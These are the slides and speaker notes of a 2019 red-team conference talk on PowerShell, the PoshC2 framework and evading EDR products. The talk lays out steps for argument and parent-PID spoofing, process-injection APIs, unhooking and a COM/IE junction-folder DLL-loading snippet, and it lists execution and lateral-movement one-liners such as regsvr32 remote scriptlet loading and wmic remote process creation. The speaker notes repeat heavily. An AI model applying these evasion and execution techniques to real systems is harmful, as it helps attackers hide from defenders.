+ Workshops - Red Teaming with PoshC2 (BSides London/Manchester 2017)
+ Trusted Third Parties are NOT Trust Worthy (GiSEC Dubai 2019) - https://bit.ly/2I9ehIg
+ 21st Century War Stories (Steelcon/BSides 2016) - https://www.youtube.com/watch?v=O8Ul6QSPuo4
+ PowerShell Fu with Metasploit (Steelcon/BSides 2015) - https://www.youtube.com/watch?v=ottfZFRSsj4
Development Projects
+ Lead developer of PoshC2 - Nettitude’s Open Source Command & Control (C2) Framework
+ General day to day PowerShell / C# projects & security research
4. @b4ggio_su
+ Principal Security Consultant @ Nettitude
+ A Red Team Lead in the Global Red Team Operation @ Nettitude
+ 16 years in IT:
• 4 years as a sysadmin
• 4 years in a defensive role
• 8 years in an offensive role
Training / Talks
+ Advanced Threat Actor Simulation - Red Team Training Course
+ Red Team & Stuff (Bsides Mcr 2018 / OWASP Warwick 2019)
5. @rbmaslen
+ Principal Security Consultant @ Nettitude
+ Red Teamer/Tools developer
+ 20 years in IT:
• 14 years as a developer (mainly C++, C#, HTML/JS)
• 6 years in an offensive role
+ CCT / CCSAM / OSCP / OSCE
Training / Talks
+ Thick Client Destruction (Steelcon 2017)
+ COM and the PowerThIEf (Steelcon 2018)
Development Projects
+ Contributor to PoshC2 - Nettitude’s Open Source Command & Control (C2) Framework
+ PowerThIEf, SharpSocks, C# portscanner & ArpScan
6. Team Spicy Weasel
1st Place - 2018
+ labs.nettitude.com/blog/derbycon-2018-ctf-write-up
1st Place - 2017
+ labs.nettitude.com/blog/derbycon-2017-ctf-write-up
3rd Place - 2016
+ labs.nettitude.com/blog/derbycon-2016-ctf-write-up
7. What is PowerShell & is it DEAD?
1. The Microsoft binary - ”PowerShell.exe”
2. The DLL behind the binary
”System.Management.Automation.Dll”
3. The folder -
C:WindowsSystem32WindowsPowerShellv1
.0
4. The version? Is PSv2 dead or only versions
after 4 because of Transcript Logging,
ScriptBlock Logging, Module Logging & AMSI
Integration
https://www.youtube.com/watch?v=IYD_aiQtVaE
9. Evolution of PoshC2 2016 -> 2019
2016
June - v1.0 First Release of PoshC2 (Server/Implant in PowerShell)
Dec - v2.0 Released - C# GUI, Daisy Chaining & Portability
2017
Mar - v2.1 Removed C# GUI
May - PoshC2 Slack channel announced
July - PoshC2_Python Release
Oct – Reflective DLL / Shellcode Released
Nov - v3.0 Released with SharpSocks
2018
Feb - Readthedocs Documentation Released
July - v4.0 Released with Python Implant
2019
Jan - v4.8 Sharp Implant
Feb - Support for 2003/XP
June - SharpSocks Integration
13. Carbon Black / Tanium / EDR
1. This is probably the best query in carbon black to detect malicious
activity:
“process_name:powershell.exe”
2. Do a search across your estate and see how much this
shows up…….
14. Carbon Black / Tanium / EDR
1. This is probably the best query in carbon black to detect malicious
activity:
“modload:system.management.automation.dll”
“modload:system.management.automation.ni.dll”
2. Filter out “powershell.exe”, and others……
3. Do a search across your estate and see how much this shows
up…….
15. Defensive / Legacy Approach
(Reactive)
Block powershell.exe on all endpoints
Only allow signed powershell scripts to be executed
Upgrade “powershell.exe” to v5.0 for greater visibility
Enable constrained mode to restrict language elements
Monitor for “System.Management.Automation.Dll” in processes
Integrate AMSI with AV vendor for early signature detection
Enable & Monitor ScriptBlock Logging for suspicious cmdlets
Enable & Monitor Transcript Logging for suspicious signatures
Enable & Monitor Module Logging for signatured modules
Modern Approach
(Proactive)
19. Supposedly Used by APT 33
Suspected attribution: Iran
Target sectors: Aerospace, energy
Overview: APT33 has targeted organizations, spanning
multiple industries, headquartered in the U.S., Saudi
Arabia and South Korea. APT33 has shown particular
interest in organizations in the aviation sector involved in
both military and commercial capacities, as well as
organizations in the energy sector with ties to
petrochemical production
• https://www.fireeye.com/blog/threat-
research/2018/12/overruled-containing-a-potentially-
destructive-adversary.html
• https://www.fireeye.com/blog/threat-
research/2017/09/apt33-insights-into-iranian-cyber-
espionage.html
• https://www.fireeye.com/current-threats/apt-
groups.html#apt33
34. Avoidance – Tanium Signal Definition
image.path contains ‘system.management.automation’
AND process.path contains NOT ‘mscorsvw.exe’
AND process.path contains NOT ‘monitoringhost.exe’
AND process.path contains NOT ‘powershell.exe’
AND process.path contains NOT ‘powershell_ise.exe’
AND process.path contains NOT ‘sdiagnhost.exe’
AND process.path contains NOT ‘servermanager.exe’
AND process.path contains NOT ‘sqlps.exe’
AND process.path contains NOT ‘wsmprovhost.exe’
AND process.path contains NOT ‘Microsoft Azure AD
SyncBinmiiserver.exe’
(Does require process tracing to be enabled in Tanium - quite
heavy)
Warning - Not doing a hash
checksum on the processes
or their location
40. Process Argument Spoofing
1. Create a process suspended – Fake Arguments
2. Identify the PEB using NTQueryProcessInformation
3. Parse PEB and Commandline structure
4. Overwrite the Commandline arguments using
WriteProcessMemory – Real Arguments
5. Resume the process
41. Process Argument Spoofing
https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing
https://blog.xpnsec.com/how-to-argue-like-cobalt-strike/
https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/
42. Process Argument Spoofing – WHY?
Execution
Powershell One Liner
regsvr32.exe /s /i:http://URL/file.sct scrobj.dll
wmic os get /FORMAT:”evil.xsl”
Lateral Movement
SC COMPUTERNAME stop "SERVICENAME“
wmic.exe /node:<target> /user:<user>
/password:"<password>" process call create
"%Systemroot%Tempbatchfile.bat“
44. Partying With EDR
Migration Basics - Win API Calls:
VirtualAllocEX
WriteProcessMemory
CreateRemoteThread
http://deniable.org/misc/inject-all-the-things
However there are many ways to do the same thing, quick
examples:
RtlCreateUserThread SetWindowsHookEx
NtCreateThreadEx QueueUserAPC
45.
46. “In computer programming, the term hooking covers a range of techniques used to alter or
augment the behaviour of an operating system, of applications, or of other software components
by intercepting function calls or messages or events passed between software components. Code
that handles such intercepted function calls, events or messages is called a hook.” - Wikipedia
What is Hooking?
53. Re-Patch Memory to remove JMP to original code
Update the IAT table to point to the correct function
Create a stub – to carry out the same system calls
Free a number of API calls and use FreeLibrary to remove
interfering DLL’s
https://medium.com/@fsx30/bypass-edrs-memory-protection-
introduction-to-hooking-2efb21acffd6
Bringing Back The Good Times
57. COM Intro – just watch this
https://vimeo.com/214856542
58. Spoke about this at Steelcon last year, has proved really
handy
Has been used to get past some EDRs
Breaks the attribution between process
Migrating with COM into IE
59. The key to this? Junction folders
Junction folders, a technique leaked in the Vault 7 dumps
Forms the basis of Sandbox escapers recent IE 11 sandbox
escape
After adding some registry keys allows code to be executed
when you navigate to a folder
62. If we can get a reference to an IE Windows we can call
URL needs to be in the format shell:::{<GUID>}
https://docs.microsoft.com/en-us/previous-
versions/windows/internet-explorer/ie-developer/platform-
apis/aa752094(v%3Dvs.85)
How can we use that
63. Great COM class allows you to enumerate all the current open IE &
Explorer windows and automate them
Guess what you can then get them to navigate to a new location
https://msdn.microsoft.com/en-
us/library/windows/desktop/bb773974(v=vs.85).aspx
ShellWindows
64. Loading the DLL in IE, PowerShell
$shellWinGuid = [System.Guid]::Parse("{9BA05972-F6A8-11CF-A442-
00A0C90A8F39}")
$typeShwin = [System.Type]::GetTypeFromCLSID($shellWinGuid)
$shwin = [System.Activator]::CreateInstance($typeShwin)
$shWin[0].Navigate2("shell:::{56B6E39E-AB81-4E34-BC8B-99D1D28FB7E4}",
2048)
/*CLSID must be in the format "shell:::{CLSID}"
Second param 2048 is BrowserNavConstants value for navOpenInNewTab
https://msdn.microsoft.com/en-us/library/dd565688(v=vs.85).aspx
Further ideas on what payloads you may be able to use
*/
68. Only use Native DLL’s? thankfully not
Using CCW’s Com Callable Wrappers we can write a .net dll
and configure the registry keys so that when navigated to
we can launch a .net dll. Use this as a COM Hijack if you
want.
No time to go into CCW in depth but have a read of
https://docs.microsoft.com/en-
us/dotnet/framework/interop/com-callable-wrapper
.Net is started in IE and loads the dll
We need a .net assembly with class that implements an
interface and some registry keys
COM Callable Wrapper
73. Setting up the .net registry keys
Just make sure that you create or import the keys from a
x64 application or use the explicit 64 bit key from the link
below
https://docs.microsoft.com/en-
us/windows/desktop/sysinfo/32-bit-and-64-bit-application-
data-in-the-registry
75. One last thing – remember this script
$shellWinGuid = [System.Guid]::Parse("{9BA05972-F6A8-11CF-A442-
00A0C90A8F39}")
$typeShwin = [System.Type]::GetTypeFromCLSID($shellWinGuid)
$shwin = [System.Activator]::CreateInstance($typeShwin)
$shWin[0].Navigate2("shell:::{56B6E39E-AB81-4E34-BC8B-99D1D28FB7E4}",
2048)
/*CLSID must be in the format "shell:::{CLSID}"
Second param 2048 is BrowserNavConstants value for navOpenInNewTab
https://msdn.microsoft.com/en-us/library/dd565688(v=vs.85).aspx
Further ideas on what payloads you may be able to use
*/
79. EDR Summary
EDR is not a silver bullet
Does give incredible visibility to the Blue Team
Highly recommended as a complimentary piece to the
defensive strategy but should not be solely relied on
Does not replace good people with experience
Constant Cat and Mouse game
80. Future Predictions
1. Over reliance on EDR, especially on user endpoints and not
server land or non Windows Systems
2. Customers focussing all attention on tertiary endpoints and not on
critical functions or sensitive customer data
3. Move to Zerotrust networks and MFA everywhere
4. Machine Learning – Investment into Process & Procedures
5. C2 frameworks moving to C++ base code – Could see MSF be
revived for red teaming
6. All standard AV/EDR vendors adopting in memory scanning / AMSI
7. Windows 7 is EOL January 2020 – not a prediction but a reality
8. Windows 10 removal of .NET v2 – not a prediction but a reality
9. People going back to single executables running either C++ or C#
code to evade LOLBAS signatures (LOLBAS vs arbitrary exe)
81. Future Predictions
1. Over reliance on EDR, especially on endpoints and not
server land (or unix really)
2. C2 frameworks moving to C++ base code – Could see MSF
be revived for RT
3. We already have this level of capability and its interesting
what gets detected and what does not
4. All standard AV/EDR vendors adopting in memory scanning
5. Windows 7 is EOL January 2020 – not a prediction but a
massive jump
6. Windows 10 removal of .NET v2
7. People going back to single executables running either c++
or c# code to evade lolbins signatures and
82. THANK YOU
Ben Turner @benpturner
Doug McLeod @b4ggio_su
Rob Maslen @rbmaslen
https://www.steelcon.info/training/
https://www.slideshare.net/nettitude_labs/powershell-is-dead-epic-learning
Editor's Notes
So whoami! My name is Ben Turner, I head up the Global Red Team @ Nettitude.
As evident from the geeky title I’m a PowerShell & .NET enthusiast!
One of the main reasons i’m standing here (ontop of being accepted to talk) is because over the last two years I’ve seen and met 3 or 4 people who have explicitly said to me they are in the industry and want to do red teaming because they saw my talks and were inspired! This really resonated with me and I thought and I want to encourage anyone to get up and talk. The industry as a whole has some people who try to crush people but
Some other places you may have seen us is at Derbycon, we’re quite a keen attender of this conference.
If you like CTF’s check out some of the blogs we wrote off the back of the cons.
It will be sad this year its coming to an end – hopefully we can go out with a bang and maintain that 1st place position!
.NET reflection can unhook
So there has been a lot of talk about Powershell is dead and I wanted to share my small view of the world, with a slight focus on the evolution or PoshC2.
For those not aware, PoshC2 Is a command and control framework that was created in purely powershell, designed to run on any windows endpoint.
RAT – NOT Malware……
First of all created for learning purposes and evolved into much more, it really started out as 60 lines of code – this was including the logo!
And now is in the 10s of thousands of lines of code.
Lets think from an OPSEC perspective and show the start of PoshC2
Started out as a windows only c2 server and c2 implant written for only powershell….
Can anyone tell me what's wrong with this picture!
PAUSE………………………..
Probably more obvious, a malicious PowerShell process has started as the user Jason…
Lets dig a bit deeper and look at what the PowerShell command line arguments looks like to start with….
This is the default PoshC2 PowerShell implant
Simple detections, anything running “powershell.exe” especially spawned from office, mshta, vbscript, jscript etc
How easy is it to spot this
Presence of the normal, abnormal presence of the????
Can you threat hunt across your estate?
NO!
Its just getting more difficult to deploy, and is only as good as the monitoring in place.
There is lots of obfuscation that is still possible to evade static analysis and even dynamic analysis toolkits
NO!
Its just getting more difficult to deploy, and is only as good as the monitoring in place.
There is lots of obfuscation that is still possible to evade static analysis and even dynamic analysis toolkits
All throughout of 2018 APT 33 were being tracked by FireEye
Amongst many other known threat actor groups, but the reason I pick on these guys is that they have been known to use PoshC2.
People have been calling PoshC2 malware, but I would call this a remote access toolkit (RAT) that can be used for multi purposes
Attribution is most likely IRAN
And typically used across the aerospace and energy sectors…
What’s really interesting here is that the IOCs (indicators of compromise) are that the threat actor is using the defaults, e.g. powershell one liners and are still having a huge amount of success
Explicitly a guy called Andrew from FireEye – @QW5kcmV3
The next big thing is the C# implant
This is where it gets tough to find an implant as the clr.dll or mscoree.dll is loaded into more things than you realise
Started out as a windows only c2 server and c2 implant written for only powershell….
Started out as a windows only c2 server and c2 implant written for only powershell….
DEMO!!!!! IF WE HAVE TIME
Endpoint Detection and response is software that sends behavioural data to a central database for analysis
This is us when we run a process list and see an EDR system!!
But all is not lost and we have some example stories about challenges faced with different EDR solution
Behaviour based not just signature
We thought the blue team were watching an account which we needed to use. So we distracted them
We know carbon black will flag on unsigned binaries connecting to the internet, so we pushed out unsigned binaries to a handful of machines and ran them
Enough to keep them busy
If the blue team have so much visibility, how can we through them of the sense.
This is trickery and there are many things that can be done, but two that im going to lightly cover are Parent Pid spoofing and Argument spoofing….deliberately to mess with process chaining.
STARTUPINFOEX
This structure contains an lpAttributeList
Update pid using UpdateProcThreadAttribute
Event Tracing for Windows – ETW
First screenshot shows the parent section process the same as the one below.
Second example shows that the parent process and the Process ID in the parent are different.
Process Argument Spoofing
First of got to give credit to some of the initial people discussing this. Casey smith AND Will Burgess’s
If you haven’t seen will’s talk - RedTeaming in the EDR Age then you should definitely go give it a watch.
Also covers a tool they created Gargoyle to hide malware in memory.
And, finally, programs that determine process arguments by reading the process PEB will see your real arguments and not our fake arguments.
Migration basics – number of API calls – generally basic example will take a handle on another process and call virtualAllocEx, WriteProcessMemory and CreateRemoteThread
These are not the only options available to us.
Inject all the things – is a nice we project to assist in testing some of these calls – you should check it out
Instead of using create remote threat we can use for example RTLCreateUserThreat – this bypassed the checks Symantec were looking for and we ended up with successful migration.
In short it is a technique that allows you to alter or augment the behaviour of the operating system.
Hook a function do bad things……. In old school gaming this is equivalent to hacking a game so that you cannot die.
Turns out the last option is super common
Kernel Patch Protection or Patch Guard scans the kernel on almost every level and will triggers a BSOD if a modification is detected. This includes the area’s where the WINAPI’s logic is carried out.
ZW Create Thread EX
In Process Client
Hoang Bui
XPN
Many other examples – show these options to be rather easy.
NO!
Its just getting more difficult to deploy, and is only as good as the monitoring in place.
There is lots of obfuscation that is still possible to evade static analysis and even dynamic analysis toolkits
My house my rules
What am I going to do about it?
F*cking Judo Chop it the hell outta there!
@fsx30
XPN
Many other examples – show these options to be rather easy.
Navgiating to this folder means that Code will executed within explorer
@fsx30
XPN
Many other examples – show these options to be rather easy.
@fsx30
XPN
Many other examples – show these options to be rather easy.
My house my rules
What am I going to do about it?
F*cking Judo Chop it the hell outta there!
My house my rules
What am I going to do about it?
F*cking Judo Chop it the hell outta there!
My house my rules
What am I going to do about it?
F*cking Judo Chop it the hell outta there!
@fsx30
XPN
Many other examples – show these options to be rather easy.
@fsx30
XPN
Many other examples – show these options to be rather easy.
@fsx30
XPN
Many other examples – show these options to be rather easy.
@fsx30
XPN
Many other examples – show these options to be rather easy.
@fsx30
XPN
Many other examples – show these options to be rather easy.
My house my rules
What am I going to do about it?
F*cking Judo Chop it the hell outta there!
Turns out the last option is super common
We already have this level of capability and its interesting what gets detected and what does not
Harder to pwn 2003/xp/nt
Palentir, AI, machine learning, dark trace……
Microsoft ATA, ATP, Defender